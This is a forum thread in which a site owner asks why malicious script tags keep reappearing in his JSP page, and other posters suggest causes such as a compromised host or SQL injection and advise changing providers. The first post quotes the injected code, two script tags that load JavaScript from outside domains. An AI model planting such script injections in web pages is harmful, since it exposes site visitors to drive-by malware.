Malware inserted into my JSP?

Hello,

I have publisched a site in a hosty server.

Recently i have discove that in my index.jsp page there is a malware code:

<html><body><script type="text/javascript" src="http://rafalpasko.hekko.pl/minijtools.js"></script><script type="text/javascript" src="http://tasavang.com/jtoolsmini.js"></script></body></html>

I have cleaner the code, but periodically the malware code reappear....

I don't know how that is possible...

anybody know a method to stop that???

Thank you and excuse for my terrible english...

So somebody is getting connected to the place where your code is hosted and changing your code? You should discuss the security of your code with your hosting company, then.

my hosting company say that depend by sql injection, but i don't know how that can modify my code...

They could be right, I suppose. Your code could be vulnerable to SQL injection attacks. Or on the other hand, they might be saying that with no knowledge of your code.

However everybody else in the world is in the same position -- you are the only one who knows anything about your code.

I don't see how SQL injection can insert text into a JSP on the file system. I assume that these JSP templates are not stored in the database?

Also, please avoid single-word subjects -- I have adjusted yours to something more appropriate as an example.

anybody know a method to stop that???

Sure, you either switch to a different hosting company or build your own web server and host web sites yourself.

Thank you for reply,

build my own host web sites is a good idea!!!

can you give me some indication for build my own web server and host web sites???

Can you post me some link taht to explain how to do???

Are you talking about a file that's stored on your host? Or is this about an HTML page that arrives in your browser?

If the former, then you have definitely issues with your hosting provider and should switch, or at least get security straightened out.

If the latter, then it may well be that the code is inserted en route by a network provider - yours, or an upstream one.

Luca Carletti wrote:build my own host web sites is a good idea!!!

Actually, it's not. If you have no idea what you are doing, you're site will be even less secure than it is now. The answer is to find a hosting provider that knows what they are doing.

Luca Carletti wrote:my hosting company say that ...

What's your host company name?